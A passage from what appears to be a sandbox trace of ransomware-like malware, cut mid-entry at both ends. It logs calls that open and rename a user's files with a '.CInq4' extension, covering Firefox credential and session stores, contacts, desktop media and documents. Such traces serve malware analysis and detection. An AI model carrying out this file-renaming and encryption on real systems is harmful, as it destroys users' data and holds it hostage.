(lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite.cinq4")) returned 1 [0044.083] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini.cinq4")) returned 1 [0044.114] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite.cinq4")) returned 1 [0044.180] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite.cinq4")) returned 1 [0044.181] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0044.181] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0044.234] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.cinq4")) returned 1 [0044.239] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0044.239] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0044.247] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db.cinq4")) returned 1 [0044.248] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log.cinq4")) returned 1 [0044.262] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite.cinq4")) returned 1 [0044.827] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite.cinq4")) returned 1 [0044.896] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat.cinq4")) returned 1 [0044.909] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js.cinq4")) returned 1 [0044.932] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json.cinq4")) returned 1 [0044.949] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db.cinq4")) returned 1 [0044.951] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak.cinq4")) returned 1 [0044.955] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js.cinq4")) returned 1 [0044.994] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite.cinq4")) returned 1 [0044.996] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json.cinq4")) returned 1 [0044.998] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt.cinq4")) returned 1 [0045.047] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite.cinq4")) returned 1 [0045.049] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.cinq4")) returned 1 [0045.067] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mxr6.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mxr6.swf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mxr6.swf.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mxr6.swf.cinq4")) returned 1 [0045.082] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\nIGxj2X.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\nigxj2x.bmp"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\nIGxj2X.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\nigxj2x.bmp.cinq4")) returned 1 [0045.083] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\OaY7e6g1t_2dY.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\oay7e6g1t_2dy.rtf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\OaY7e6g1t_2dY.rtf.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\oay7e6g1t_2dy.rtf.cinq4")) returned 1 [0045.086] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\obZ3fvDOvaGgm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\obz3fvdovaggm.bmp"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\obZ3fvDOvaGgm.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\obz3fvdovaggm.bmp.cinq4")) returned 1 [0045.090] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\Ru9h2qEjn2zXAzNP.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ru9h2qejn2zxaznp.jpg"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\Ru9h2qEjn2zXAzNP.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ru9h2qejn2zxaznp.jpg.cinq4")) returned 1 [0045.092] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\uihiW9lJeoF869.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uihiw9ljeof869.swf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\uihiW9lJeoF869.swf.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uihiw9ljeof869.swf.cinq4")) returned 1 [0045.094] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\uVSh.pps" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uvsh.pps"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\uVSh.pps.CInq4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uvsh.pps.cinq4")) returned 1 [0045.099] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\Administrator.contact.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact.cinq4")) returned 1 [0045.101] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\contacts\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini.cinq4")) returned 1 [0045.117] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.cinq4")) returned 1 [0045.135] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.cinq4")) returned 1 [0045.141] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.cinq4")) returned 1 [0045.143] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.cinq4")) returned 1 [0045.158] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.CInq4" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.cinq4")) returned 1 [0045.165] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\3V7EOA.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\3v7eoa.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\3V7EOA.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\3v7eoa.bmp.cinq4")) returned 1 [0045.169] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\5uaSKEr4bBUrOcV.odt" (normalized: "c:\\users\\eebsym5\\desktop\\5uasker4bburocv.odt"), lpNewFileName="c:\\users\\eebsym5\\desktop\\5uaSKEr4bBUrOcV.odt.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\5uasker4bburocv.odt.cinq4")) returned 1 [0045.171] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\6HjH3n9FWlBwapw.swf" (normalized: "c:\\users\\eebsym5\\desktop\\6hjh3n9fwlbwapw.swf"), lpNewFileName="c:\\users\\eebsym5\\desktop\\6HjH3n9FWlBwapw.swf.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\6hjh3n9fwlbwapw.swf.cinq4")) returned 1 [0045.173] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\8HiAFVOlg-DGPUklk6n.png" (normalized: "c:\\users\\eebsym5\\desktop\\8hiafvolg-dgpuklk6n.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\8HiAFVOlg-DGPUklk6n.png.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\8hiafvolg-dgpuklk6n.png.cinq4")) returned 1 [0045.182] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\2zf9Tk.png" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\2zf9tk.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\2zf9Tk.png.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\2zf9tk.png.cinq4")) returned 1 [0045.185] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\dJ9gQhS1qT3LJpBx2k_l.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\dj9gqhs1qt3ljpbx2k_l.mp4"), lpNewFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\dJ9gQhS1qT3LJpBx2k_l.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\dj9gqhs1qt3ljpbx2k_l.mp4.cinq4")) returned 1 [0045.188] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\OV2KETm vRcSS.ods" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\ov2ketm vrcss.ods"), lpNewFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\OV2KETm vRcSS.ods.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\ov2ketm vrcss.ods.cinq4")) returned 1 [0045.192] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\tMsz9fchZoyeFz.swf" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\tmsz9fchzoyefz.swf"), lpNewFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\tMsz9fchZoyeFz.swf.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\tmsz9fchzoyefz.swf.cinq4")) returned 1 [0045.193] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\Z8mOx85_eP.xls" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\z8mox85_ep.xls"), lpNewFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\Z8mOx85_eP.xls.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\z8mox85_ep.xls.cinq4")) returned 1 [0045.200] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\desktop\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\desktop.ini.cinq4")) returned 1 [0045.204] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\eieHCNgft4loKCrVtA.ods" (normalized: "c:\\users\\eebsym5\\desktop\\eiehcngft4lokcrvta.ods"), lpNewFileName="c:\\users\\eebsym5\\desktop\\eieHCNgft4loKCrVtA.ods.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\eiehcngft4lokcrvta.ods.cinq4")) returned 1 [0045.208] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\igRWm8V5jW5uAeAOnz.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\igrwm8v5jw5uaeaonz.jpg"), lpNewFileName="c:\\users\\eebsym5\\desktop\\igRWm8V5jW5uAeAOnz.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\igrwm8v5jw5uaeaonz.jpg.cinq4")) returned 1 [0045.212] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\IO7i n.ots" (normalized: "c:\\users\\eebsym5\\desktop\\io7i n.ots"), lpNewFileName="c:\\users\\eebsym5\\desktop\\IO7i n.ots.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\io7i n.ots.cinq4")) returned 1 [0045.214] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\NZqZPYC.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\nzqzpyc.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\NZqZPYC.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\nzqzpyc.bmp.cinq4")) returned 1 [0045.218] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\px3idt\\5nu8-FDf95Oj.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\px3idt\\5nu8-fdf95oj.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\px3idt\\5nu8-FDf95Oj.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\px3idt\\5nu8-fdf95oj.bmp.cinq4")) returned 1 [0045.226] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\px3idt\\kjUgeo.swf" (normalized: "c:\\users\\eebsym5\\desktop\\px3idt\\kjugeo.swf"), lpNewFileName="c:\\users\\eebsym5\\desktop\\px3idt\\kjUgeo.swf.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\px3idt\\kjugeo.swf.cinq4")) returned 1 [0045.232] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\sbVtvoiRvzko.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\sbvtvoirvzko.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\sbVtvoiRvzko.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\sbvtvoirvzko.bmp.cinq4")) returned 1 [0045.235] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\sP5Wi4z896PmAG.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\sp5wi4z896pmag.pptx"), lpNewFileName="c:\\users\\eebsym5\\desktop\\sP5Wi4z896PmAG.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\sp5wi4z896pmag.pptx.cinq4")) returned 1 [0045.239] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\QWxH6AY0aE-AZi.ods" (normalized: "c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\qwxh6ay0ae-azi.ods"), lpNewFileName="c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\QWxH6AY0aE-AZi.ods.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\qwxh6ay0ae-azi.ods.cinq4")) returned 1 [0045.318] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\UIaYYkumn.png" (normalized: "c:\\users\\eebsym5\\desktop\\uiayykumn.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\UIaYYkumn.png.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\uiayykumn.png.cinq4")) returned 1 [0045.324] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\VLAxuSYDTePEe x-1tp.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\vlaxusydtepee x-1tp.mp4"), lpNewFileName="c:\\users\\eebsym5\\desktop\\VLAxuSYDTePEe x-1tp.mp4.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\vlaxusydtepee x-1tp.mp4.cinq4")) returned 1 [0045.329] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\wK28d7RA9P.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\wk28d7ra9p.pptx"), lpNewFileName="c:\\users\\eebsym5\\desktop\\wK28d7RA9P.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\wk28d7ra9p.pptx.cinq4")) returned 1 [0045.333] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\XSotipysXjYhxFGSuq.swf" (normalized: "c:\\users\\eebsym5\\desktop\\xsotipysxjyhxfgsuq.swf"), lpNewFileName="c:\\users\\eebsym5\\desktop\\XSotipysXjYhxFGSuq.swf.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\xsotipysxjyhxfgsuq.swf.cinq4")) returned 1 [0045.336] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\XXPGWpk8dID vR4aFz.doc" (normalized: "c:\\users\\eebsym5\\desktop\\xxpgwpk8did vr4afz.doc"), lpNewFileName="c:\\users\\eebsym5\\desktop\\XXPGWpk8dID vR4aFz.doc.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\xxpgwpk8did vr4afz.doc.cinq4")) returned 1 [0045.340] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\Y-1QcNmR1SG.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\y-1qcnmr1sg.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\Y-1QcNmR1SG.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\desktop\\y-1qcnmr1sg.bmp.cinq4")) returned 1 [0045.343] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\3cekd.docx" (normalized: "c:\\users\\eebsym5\\documents\\3cekd.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\3cekd.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\3cekd.docx.cinq4")) returned 1 [0045.347] MoveFileW 